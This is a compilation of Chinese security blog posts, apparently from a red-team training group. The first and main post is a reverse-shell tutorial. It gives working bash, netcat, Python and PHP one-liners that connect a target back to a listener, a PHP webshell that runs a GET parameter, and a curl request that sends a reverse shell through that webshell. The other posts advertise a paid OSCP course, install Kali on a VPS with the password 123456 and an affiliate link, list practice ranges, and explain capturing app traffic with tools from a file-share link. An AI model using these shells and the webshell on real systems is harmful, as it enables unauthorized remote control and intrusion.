Linux反弹Shell实战：Bash/NC/Python/PHP实操指南 某企业的测试服务器因为安全策略限制了所有入站端口，运维工程师小李需要远程排查服务器上的日志问题，直接通过SSH连接被防火墙拦截。这时候，反弹Shell就成了他的解决办法——通过让目标主机主动发起连接，绕过入站限制，建立远程控制会话。本文就结合Bash、NC、Python、PHP四种常用工具，详细讲解反弹Shell的实战操作和注意事项。反弹Shell的基本原理反弹Shell和正向连接的主要区别在于连接发起方：正向连接是本地机器主动连接目标主机的开放端口，而反弹Shell则是目标主机主动连接本地监听的端口，将Shell会话传输过来。这种方式可以规避目标主机的入站防火墙限制，在很多受限环境中非常实用。 操作的基本流程分为两步： 1、在本地机器上开启一个端口监听，等待目标主机的连接 2、在目标主机上执行反弹命令，让主机主动连接本地监听端口，完成Shell会话的传递Bash反弹Shell实战Bash是绝大多数Linux发行版自带的Shell工具，不需要额外安装，是最常用的反弹Shell手段之一。操作步骤首先在本地机器上开启端口监听，这里我们选择4444端口（1024以上的端口无需管理员权限）：nc -lvnp 4444 参数解释：-l表示开启监听模式，-v显示详细连接信息，-n不进行域名解析，-p指定监听端口。 然后在目标主机上执行反弹命令：bash -i >& /dev/tcp/你的本地IP/4444 0>&1 命令拆解： bash -i：启动交互式Shell，支持用户输入交互命令 & /dev/tcp/你的本地IP/4444：将标准输出和标准错误输出重定向到TCP连接中 0>&1：将标准输入重定向到标准输出对应的连接，实现双向通信 如果目标主机的Bash路径不是默认的/bin/bash，可以替换为完整路径，比如/usr/bin/bash -i ...。 常见变体如果目标主机使用的是轻量系统，比如Alpine Linux，默认没有安装Bash，可以用sh替代：sh -i >& /dev/tcp/你的本地IP/4444 0>&1 另外还可以使用UDP协议的反弹命令，适合部分限制了TCP的场景：bash -i >& /dev/udp/你的本地IP/4444 0>&1 NC反弹Shell实战NC也就是Netcat，被称为“网络瑞士军刀”，支持多种网络操作，也是反弹Shell的常用工具。不过需要注意不同版本的NC功能有差异：GNU版本的NC支持-e参数，而BusyBox编译的精简版本则没有该参数。GNU NC实战（带-e参数）本地监听命令和之前一致：nc -lvnp 4444 目标主机上执行反弹命令：nc 你的本地IP 4444 -e /bin/bash 这里的-e参数表示将NC连接的输入输出重定向到后面的bash程序，实现Shell会话的传递。精简版NC（无-e参数）实战很多嵌入式设备或者轻量系统使用的是BusyBox的NC，没有-e参数，这时候可以通过命名管道实现双向通信：mknod backpipe p && nc 你的本地IP 4444 0<backpipe | /bin/bash 1>backpipe 命令拆解： 1、mknod backpipe p：创建一个命名管道backpipe，用于传递数据 2、nc 你的本地IP 4444 0<backpipe：将管道的内容作为NC的输入 3、| /bin/bash 1>backpipe：将bash的标准输出重定向到管道中，实现双向数据流转Python反弹Shell实战Python几乎预装在所有现代Linux发行版中，而且语法简洁，反弹Shell的命令兼容性很强，适合大多数有Python环境的目标主机。基础反弹命令本地监听依旧使用nc -lvnp 4444，目标主机执行以下命令：python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的本地IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 命令拆解： 1、导入socket、subprocess、os三个模块，分别用于网络连接、执行系统命令和文件描述符操作 2、创建TCP socket连接，连接到本地监听端口 3、使用os.dup2将socket的文件描述符替换为标准输入、输出和错误输出，让bash的所有输入输出都通过socket传输 4、调用subprocess.call启动交互式bash Shell 如果目标主机默认使用Python3，可以将python替换为python3。升级为完整终端有时候反弹回来的Shell会出现交互异常，比如无法使用方向键、快捷键，可以通过Python的pty模块升级为完整的终端： 在反弹得到的Shell中执行：python -c 'import pty; pty.spawn("/bin/bash")' 之后可以按Ctrl+Z将当前Shell挂起，在本地终端执行stty raw -echo，再按fg回到目标Shell，就可以获得完整的终端交互体验。PHP反弹Shell实战PHP常用于Web服务器环境，很多时候我们会通过Webshell的方式获取目标主机的执行权限，这时候PHP反弹Shell就非常实用。基础反弹命令本地监听还是nc -lvnp 4444，目标主机执行以下命令：php -r '\$sock=fsockopen("你的本地IP",4444);exec("/bin/bash -i <&3 >&3 2>&3");' 这里使用了fsockopen创建TCP连接，用文件描述符3指代socket连接，将标准输入、输出和错误都重定向到该连接。Web场景下的PHP反弹如果是通过Webshell上传的方式获取权限，可以先编写一个简单的PHP脚本：<?php if(isset(\$_GET['cmd'])){ system(\$_GET['cmd']); } ?> 将该脚本上传到目标网站的可访问目录下，然后通过浏览器或者curl命令执行反弹命令：curl http://目标网站地址/shell.php?cmd=bash+-i+>+%26+%2Fdev%2Ftcp%2F你的本地IP%2F4444+0%3E%261 注意需要对命令中的特殊字符进行URL编码，比如空格替换为+或者%20。受限PHP环境处理如果PHP被禁用了exec、shell_exec等函数，可以尝试使用其他函数，比如popen：php -r '$sock=fsockopen("你的本地IP",4444);$fp=popen("/bin/bash -i","r");while($f=fgets($fp)){fwrite($sock,$f);}' 不过这种方式的兼容性不如exec，需要根据实际环境调整。实战注意事项和排错技巧在实际操作中，经常会遇到各种问题，以下是一些实用的注意事项和排错方法： 1、请不要进行未授权的操作，反弹Shell只能在获得明确授权的设备上使用，遵守相关法律法规 2、确认本地机器和目标主机之间的网络连通性，可以先通过ping命令测试基础网络是否正常 3、检查本地和目标主机的防火墙设置，确保监听的端口没有被拦截，比如本地防火墙开放4444端口 4、如果反弹失败，可以尝试更换端口，比如使用8080、8888等常见端口，避开被占用的端口 5、如果拿到的Shell交互异常，可以使用Python的pty模块升级终端，获得更好的使用体验 6、如果目标主机没有安装对应工具，比如没有Python，可以尝试使用其他工具，比如Bash或者NC总结反弹Shell是运维和安全工作中非常实用的技术手段，不同的工具适用于不同的场景：Bash适合大多数自带Shell的Linux系统，NC适合没有Python环境的场景，Python兼容性强适合大多数现代系统，PHP则多用于Web服务器环境。掌握这四种工具的实战方法，可以帮助我们在合法授权的前提下，高效完成远程排查和测试工作。

泷羽Sec红队培训，OSCP+国际渗透测试专家中级认证 泷羽 Sec 团队专注红队教学与 OSCP 培训，在 B 站免费提供从基础到内网渗透的课程，适合各类学习者。团队的泷老师是资深红队队长，持有 OSEP、CISSP、OSCP 等高含金量证书，教学有保障。课程分析是一个以OSCP 实战与证书通过为目标，兼顾红队实战技巧与攻防思维的系统化培训。课程由理论课件（20 章 PDF）+ 大量逐日/逐机实战视频（day1–day72 等靶机/专题）组成，形成“知识讲解 → 工具演示 → 靶机实操 → 复盘总结”的闭环训练体系。覆盖范围：从基础信息收集、端口/服务扫描、Web/SQL 注入、客户端攻击、密码学、到本地提权（Windows/Linux）、端口转发与隧道、免杀、Metasploit、Active Directory（AD）枚举与高级域攻击（Kerberoast、AS-REP、票据伪造、DCSync 等）、横向移动、持久化，以及综合靶机演练与考证策略。实战资源：视频目录包含大量实操靶机，覆盖单机与域环境、应用漏洞与二进制漏洞、容器与特殊平台（Node）等真实场景。教学逻辑：讲解工具原理与命令（例如 nmap、gobuster、Burp、msf、mimikatz、BloodHound、socat、chisel、dnscat2、hashcat 等），再以视频靶机练习验证与巩固，最后通过“组合模拟攻击”训练完整攻防链路。课程亮点（为什么值得学）体系齐全、衔接明确：从入门到域渗透、从漏洞利用到免杀，课程覆盖 OSCP 考试和实战常见能力点。大量靶机练习：视频库丰富，实战场景真实，便于把理论迅速落地。工具和命令详尽：每章均有具体命令与工具用法示例，便于学员复制复现。重视提权与域攻防：Windows/Linux 提权、AD 认证攻击与横向移动讲解详尽，是通过高级靶机与企业级模拟的关键能力。实战闭环训练：第19/24章将技术串联为完整攻防流程，适合考试演练与项目实战。课程说明（面向谁、学完能做什么、考证对接）面向人群想通过 OSCP 或提升渗透测试实战能力的学员。有一定 Linux/网络基础，或愿意投入时间补基础的进阶学习者。企业安全人员、红队/蓝队工程师、CTF 选手希望系统化提升实战技能者。前置要求熟悉 Linux 基本命令、Windows 基本管理操作。对网络协议（TCP/IP、HTTP、DNS）有初步理解。基本编程或脚本能力（bash、PowerShell、Python）有助于快速吸收。学习目标（学完后你能）独立完成一次单机靶机的完整渗透测试：信息收集 → 漏洞利用 → 本地提权 → 清理痕迹。在有权限的企业 AD 环境中进行枚举、Kerberoast/AS-REP 等认证攻击、票据/传递/横向移动并可能获取域控（仅限授权实验室）。使用常用渗透工具（nmap、Burp、sqlmap、msf、mimikatz、BloodHound、socat、chisel 等）并能根据现场情况灵活组合。修改和调试 exploit、生成与混淆 payload（基础免杀）、在被防护环境下做端口转发与隧道穿透。针对 OSCP 考试场景掌握应试策略（如实操习惯、复盘方法、时间与任务分配、工具限制下的手工技巧）。与 OSCP 的对接课程重点与 OSCP 常考点高度一致：手工漏洞利用、提权、内网横向、复盘报告写作等。课程中的大量OSCP专属靶机视频非常适合 OSCP 的练习与模拟考试。注意 OSCP 考试要求的道德与授权差异：考试环境只允许对授权靶场/练习机使用，不允许攻击真实无授权目标。课程主讲：泷老师前高级红队队长配合公安打过多起案件，7年红队经验目前任职某知名安全大厂红队持有OSEP，CISSP，OSCP国际渗透测试顶级认证证书，有望冲刺OSCE3曾多次带队拿下国护前三名课程助教白小羽，泷羽Sec作者：V：baibaixiaoyu2024关于通过率目前针对于已经报名OSCP+ 官方offsec考试的学员是100%通过率，我们团队有师傅精通免杀，有师傅精通src，有师傅精通红队渗透，有师傅全栈前后端开发，各有所长3999元只是我们认识的开始，服务永不停止最新OSCP+认证课程大纲下载地址下载地址学员对我们的评价另外我们并不鼓励我们的学员贷款或者找别人借钱上课或者考证，能白嫖尽量白嫖下面是一位我们学员在龙老师的指导下在校就通过osep认证的学员，一对一的就业推荐下面是招聘方视角通过我们指导拿下offer数不胜数了，这位是我们的”大师兄“，目前在北京实习关于hvv我们也有靠谱的渠道，不用担心去当免费劳动力关于自媒体，若您发布的文章很有价值，我们会帮您转发您的文章以及作品/工具。。。。。。。。。。。等等案例就不放出来了3999，只是我们认识的开始，服务用不停止，泷羽Sec安全团队唯一官网，https://longyusec.com

在云服务器，vps中安装kali，2026最新教程 在vps中安装kali首先我这里使用的服务器是薄荷云的香港服务器，CN2线路，配置高还便宜，访问速度还快16H16G10M只需39.9起，打开如下连接即可https://www.boheidc.cn/aff/QOWYLYCV找到订购产品界面，选择香港轻量云，买一个配置相对好一点的19.9试用一个月的4H4G10M的服务器，或者旁边的0.5试用，这样安装的时候相对来说会快一点购买成功后，选择云服务器，进入购买的这台服务器详细界面你会看到登录信息界面然后打开cmd连接ssh root@[ip] 连接成功后按照如下命令执行wget https://boot.netboot.xyz/ipxe/netboot.xyz.img dd if=netboot.xyz.img of=/dev/vda 然后重启进入VNC选择linux选择要安装的系统为kali linux选择系统语言，一路回车配置主机名，使用kali配置域名为空就行配置代理信息为空，因为我们不需要，直接用默认的就行设置用户名设置密码，123456回车后等待安装即可选择第一个虚拟磁盘默认第一个完成分区操作并修改写入磁盘写入磁盘，选择是等待安装选择安装的类型，默认即可，直接回车再等待安装软件干会儿饭~下单用外卖红包+返现，能买30多块钱的东西，只要10几块哎呀，干完饭了，咋还没安装完成来玩游戏吧，抓大鹅  玩了一把抓大鹅后，终于安装完成了，开始安装GRUB启动器讲GRUB启动引导器安装到主驱动器，选择是选第二个安装完成，回车选择继续，重启设备重启后就能看到kali的默认启动界面了至此kali安装完成，输入账号密码xiaoyu / 123456开启ssh登录sudo # 提权 systemctl start ssh 使用本地的cmd ssh连接，sshkai'qi成功！最后配置ssh开启自启systemctl enable ssh 配置完成，奖励自己一把抓大鹅吧！！

全网最全渗透测试靶场推荐【2026最新靶场推荐】，拒绝信息差 这次又新增了五个常用的靶场平台，帮助师傅们在学习渗透测试的路上不迷路，在开始之前呢推荐一个永久的渗透测试知识库，点击下方链接领取1、cyberstrikelab网址：https://www.cyberstrikelab.com/CyberStrikeLab 中的综合场景包含了域渗透和内网渗透，总体上web偏简单，内网较难，也是从基础的永痕之蓝漏洞的3台靶机开始，慢慢的到7-8台内网机器，想要在这多层网络中横向移动，还是很有挑战性的，其中部分靶机涉及到免杀，需要使用最新的免杀手法攻克靶机。相关学习文章：【域渗透】CyberStrikelab靶场lab1-lab11，3w字超详细推荐指数：⭐⭐⭐⭐⭐2、hackthebox网址：https://app.hackthebox.com/Hack The Box 是一个国际知名的网络安全渗透测试实战靶场平台，提供在线的渗透测试环境与挑战，帮助网络安全学习者与从业者提升实战技能。对于HTB的排行，在国外的企业中还是很看重的，想冲外企的师傅们可以冲一冲HTB排行推荐指数：⭐⭐⭐⭐⭐⭐相关学习文章：HTB-Chemistry靶机渗透教程3、BurpSuite靶场https://portswigger.net/web-security/all-labs包含了各种web漏洞，比如http污染，走私，sql注入，xss，xxe等等，非常有学习参考的价值的，并且他们还推出了BSCP认证（含金量不大）推荐指数：⭐⭐⭐⭐4、好靶场http://www.loveli.com.cn/覆盖从0学习，通用漏洞，SRC漏洞，CTF等实战环境，无门槛。 独创技能树体系，帮你科学规划成长路径，高效进阶。每个靶场都有独立的故事情节，让你在打靶场学习SRC漏洞挖掘思路的同时不无聊。并且很多靶机都是自己的原创靶机推荐指数：⭐⭐⭐⭐⭐5、极域靶场地址：https://longyusec.com 预计年后推出泷羽Sec作者白小羽自研，目前内测中，这里做一个预告，目标是打造一个从0开始学渗透的原创靶场系列，原本是打算叫零域靶场，但是已经有了零域网安，就换了一个名推荐指数：⭐⭐⭐6、OffSec-PG靶场https://www.offsec.com/OffSec靶场，也就是PG靶场，OSCP，OSEP等认证的官方靶场，分别代表着国际渗透测试中级认证（OSCP），和高级认证（OSEP），红队必考证书，也是走向外企必考的证书之一这些证书也是全球公认的实战型渗透测试认证标杆，以严苛的实操考试著称，在企业招聘渗透测试工程师时认可度极高。国内近几年也开始认可OffSec系列证书，被浙江省规划为高级认证（OSEP）中，其中OSCP为中级认证若您需要OSCP和OSEP相关的培训，可以咨询我们推荐指数：⭐⭐⭐⭐⭐⭐7、LingJing（灵境）靶机https://github.com/414aaj/LingJingLingJing 是一款专为复杂网络环境渗透测试量身打造的桌面级本地网络安全靶场平台。手机扫码下载推荐指数：⭐⭐⭐⭐8、hackmyvm网址：https://hackmyvm.eu/HackMyVM 是一个国际性的网络安全靶场平台，提供多种虚拟机镜像靶机，用户可使用 VMware 或 VirtualBox 运行，挑战目标是获取操作系统的 root 权限和查看 flag。其靶机涵盖从入门到高阶的难度，适合不同水平的渗透测试爱好者学习与练习。这个靶场类似于Vulnhub，是综合靶机，其中部分靶机包含了域，还有少有的开源windows机器相关文章：全网首发！HMV全套13台windows域渗透教程，3w字超详细！推荐指数：⭐⭐⭐⭐⭐9、Yakit靶场-VulinboxVulinbox 是一个精心设计的 Web 安全漏洞靶场，它模拟了各类真实场景中可能出现的安全漏洞，为安全研究人员和渗透测试工程师提供了一个理想的学习和实践平台。推荐指数：⭐⭐⭐⭐10、The Hackers Labshttps://thehackerslabs.com/这是一个由行业专家设计的专业平台，提供网络安全培训、企业级解决方案，以及各种实践性的黑客挑战项目。最棒的是：所有这些服务都是完全免费的！你可以亲自尝试这些功能，学习相关知识，还能与黑客社区的其他成员一起参与竞赛！windows靶机分享，免官网下载，扫码即可保存：推荐指数：⭐⭐⭐⭐⭐11、Root Me网址：https://www.root-me.org/Root Me 是一个国际知名且免费的在线网络安全学习平台，提供CTF风格的网络安全挑战，涵盖密码学、WEB、脚本、网络、编程等内容的靶场，适合中高级学习者。12、Try Hack Me网址：https://tryhackme.com/Try Hack Me 是一个适合初学者的在线网络安全学习平台，提供结构化的课程、实战靶场和 CTF 挑战，帮助用户提升从基础到高级的网络安全技能。包括windows和linux的靶场渗透。推荐指数：⭐⭐⭐⭐⭐13、vulfocus网址：https://vulfocus.cn/Vulfocus 是一个漏洞集成平台，将漏洞环境 docker 镜像放入即可使用，开箱即用，可用于漏洞复现、POC 验证、EXP 验证等，它由白帽汇推出，本质上是一个漏洞靶场。多数用于快速测试和学习nday的攻击手法。推荐指数：⭐⭐⭐⭐14、vulhub网址：https://github.com/vulhub/vulhubVulhub 是一个开源的漏洞靶场项目，基于 Docker 和 Docker-Compose 技术，提供一系列预构建的漏洞环境，用户可以快速搭建和测试各种漏洞场景，适合中高级学习者进行漏洞复现和研究推荐指数：⭐⭐⭐15、vulnhub网址：https://www.vulnhub.com/和hackmyvm类似，是一个开源漏洞靶场项目，基于 Docker 和 Docker-compose 技术，提供一系列预构建的漏洞环境，用户可快速搭建和测试各种漏洞场景，适合中高级学习者进行漏洞复现和研究。推荐指数：⭐⭐⭐⭐⭐16、vulntargethttps://github.com/crow821/vulntargetvulntarget 最初由星期五实验室发起，早期作为综合性实战靶场由网络安全爱好者共同维护。目前，从 vulntarget-n 开始，该靶场由crow 单独负责维护。目前正在不断更新中。。。。。。vulntarget是一个开源的靶场，也欢迎提交您的设计！扫码下载推荐指数：⭐⭐⭐⭐17、XCTF攻防世界网址：https://adworld.xctf.org.cn/XCTF 攻防世界是一个专注于网络安全的在线平台，提供大量高质量的 CTF 题目和实训环境，适合不同水平的学习者提升实战技能。推荐指数：⭐⭐⭐⭐18、XSS小游戏网址：https://xss.haozi.me/#/xss学习必备的小游戏推荐指数：⭐⭐19、墨者学院网址：https://www.mozhe.cn/墨者学院是一个专业的网络安全在线靶场平台，专注于实战技能培养，适合网络安全学习者提升攻防能力。推荐指数：⭐⭐⭐⭐20、封神台网址：https://hack.zkaq.cn/封神台是掌控安全推出的一个在线攻防演练靶场，专注于网络安全渗透测试演练，适合网络安全学习者和从业者进行实战技能提升推荐指数：⭐⭐⭐21、春秋云镜https://yunjing.ichunqiu.com/春秋云镜是一个专注于实战化的网络安全攻防演练靶场平台，提供了多样化的漏洞环境和场景，以帮助用户提升网络安全技能和攻防实战能力。推荐指数：⭐⭐⭐⭐22、玄机靶场https://xj.edisec.net/玄机靶场是一个专业的网络安全实验平台，提供多样化的攻击场景库和丰富的题库，涵盖渗透测试、应急响应、CTF竞赛等领域，适合不同层次的学习者进行实战训练，提升网络安全技能。推荐指数：⭐⭐⭐⭐23、红日靶场http://vulnstack.qiyuanxuetang.net/vuln/红日靶场是一个由红日安全团队打造的网络安全靶场平台，其特点是提供模拟真实企业内网的环境，涵盖域控、黄金票据等高级内网渗透场景，适合具备一定基础的学习者进行实战训练。靶场通过虚拟机镜像形式提供，需本地部署使用推荐指数：⭐⭐⭐⭐⭐24、ctfhubhttps://www.ctfhub.com/CTFHub 是一个专注于信息安全竞赛的在线学习平台，提供题目练习、赛事跟踪等服务，适合 CTF 爱好者学习和提升技能。它有完整的top10基础靶场还有技能树，非常适合初学者，不管是CTF还是刚入门不久的师傅们，只要签到就能领金币推荐指数：⭐⭐⭐⭐⭐25、ctfshowhttps://ctf.show/CTFShow 是一个在线的网络安全学习平台，提供丰富的 CTF 题目和解题思路，适合 CTF 爱好者学习和提升技能。知名CTF平台，由1w+ctfser们打造推荐指数：⭐⭐⭐⭐⭐26、AltoroJhttps://demo.testfire.net/AltoroJ 是一个开源的银行应用程序，用于展示 Web 应用安全漏洞，适合网络安全学习者进行安全测试和教育训练。它包含多种漏洞，如 SQL 注入、跨站脚本攻击等，旨在帮助学习者深入了解 Web 应用的安全性问题和防御策略。推荐指数：⭐⭐⭐27、vulnwebhttp://vulnweb.com/Vulnweb 是一个故意设置安全漏洞的 PHP 在线商店示例，用于测试网页漏洞扫描工具和技能，如 SQL 注入、跨站脚本攻击等。它模拟真实的漏洞环境，帮助开发者、安全研究人员和学生学习常见的 Web 应用安全漏洞推荐指数：⭐⭐⭐28、XSS-LABhttps://vuln.longyusec.com/xss-labs是一个专注于跨站脚本攻击（XSS）学习和测试的开源靶场，提供多种XSS漏洞场景，帮助用户理解XSS攻击原理、掌握防御技巧，并通过实践提升安全意识和技能。这也是新手必刷靶场了推荐指数：⭐⭐⭐⭐29、SQL-LABShttps://vuln.longyusec.com/sql-libs是一个专门用于学习和测试SQL注入的开源平台，它提供了一系列的注入场景和关卡，帮助开发者和安全测试人员深入理解SQL注入的原理和防范方法。通过sql-libs，用户可以实践不同类型的SQL注入攻击，并学习如何编写安全的代码来避免这些漏洞。新手必刷靶场推荐指数：⭐⭐⭐⭐30、DVWAhttps://vuln.longyusec.com/DVWA是一个用于演示网页应用安全漏洞的开源软件平台，旨在帮助安全专业人士、学生及开发者理解并学习常见安全漏洞。它模拟了多种漏洞场景，如SQL注入、XSS等，提供安全测试环境。新手必练靶场之一。推荐指数：⭐⭐⭐⭐31、upload-labshttps://vuln.longyusec.com/upload-labs是一个使用PHP语言编写的，专门用于渗透测试和CTF中遇到的各种文件上传漏洞的靶场，旨在帮助用户深入了解文件上传漏洞的原理和防范措施。它提供了一系列模拟文件上传漏洞的实验环境，每个关卡都包含着不同的上传方式和挑战。推荐指数：⭐⭐⭐⭐32、mutillidaehttps://vuln.longyusec.com/Mutillidae 是一个免费、开源的 Web 应用程序安全漏洞靶场，由 OWASP 社区支持，包含丰富的渗透测试项目，如 SQL 注入、跨站脚本攻击、文件包含等，旨在帮助学习者理解和发现常见的 Web 应用安全问题。推荐指数：⭐⭐⭐33、JAVA Sec Labhttps://github.com/whgojp/JavaSecLabJavaSecLab 是一款综合型 Java 漏洞平台，提供相关漏洞缺陷代码、修复代码、漏洞场景、审计 SINK 点、安全编码规范，覆盖多种漏洞场景，拥有友好用户交互 UI，适合安全研究人员、开发人员和安全服务人员学习和理解 Java 安全漏洞的生成、修复和审计过程。推荐指数：⭐⭐⭐⭐⭐感谢师傅能看到这里再送一波福利，师傅们不想要一个一个看，那么我都准备好了，在 longyusec.com 中点击相关的链接就可以进入相应的靶场啦，如果还有比较热门的靶场没有提交到这，欢迎师傅们投稿 + baibaixiaoyu2024往期推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等内网渗透，流量转发Linux内网渗透（2w字超详细）AD域内网渗透-三种漏洞利用方式【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

告别burp，2026最新yakit + proxifier小程序抓包教程 在使用burp抓包的时候，最近老有问题，抓不到包，干脆直接用yakit了用完之后真香，不说那么多废话直接开始⬇⬇⬇⬇⬇本文配套工具 中文proxifier+yakit 地址 ⬇⬇⬇⬇⬇https://pan.quark.cn/s/d074defb7120⬆⬆⬆⬆⬆⬆⬆首先我们打开 proxifier，我们选择配置文件添加代理服务器，配置如下打开yakit，安装MITM证书！选择手动安装，这步是重点！双击执行选择是开始抓包选择MITM，并配置好代理切换proxifier设置代理规则选择添加（我这里已经添加好了）我们随便打开一个小程序，在任务管理器中找到这个应用下拉，随便选一个打开文件所在位置找到这个exe在proxifier的代理规则中，添加代理规则，选择浏览找到微信小程序的那个app他会出现如下内容再选择这里点击确定即可，确保你这个勾选好了这个时候yakit就能正常抓小程序包了，选择手动劫持或者自动劫持都可以，用过之后就知道什么东西了常见问题proxifier抓不到小程序包1、在配置文件中找到高级选项，再选择HTTP代理服务器打开这个选项2、在配置文件中找到名称解析取消勾选自动检测DNS，选择通过代理解析主机名称这样之后，proxifier 就能抓到小程序的包了，尽情的渗透测试吧！